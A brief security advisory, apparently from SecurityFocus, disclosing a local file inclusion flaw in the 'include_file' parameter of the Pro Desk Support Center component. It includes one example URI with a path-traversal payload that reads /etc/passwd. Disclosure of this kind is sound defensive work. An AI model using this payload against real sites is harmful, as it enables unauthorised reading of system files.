Pro Desk Support Center 'include_file' Parameter Local File Include Vulnerability

Attackers may exploit this issue through a browser.

The following example URI is available:

http://www.example.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus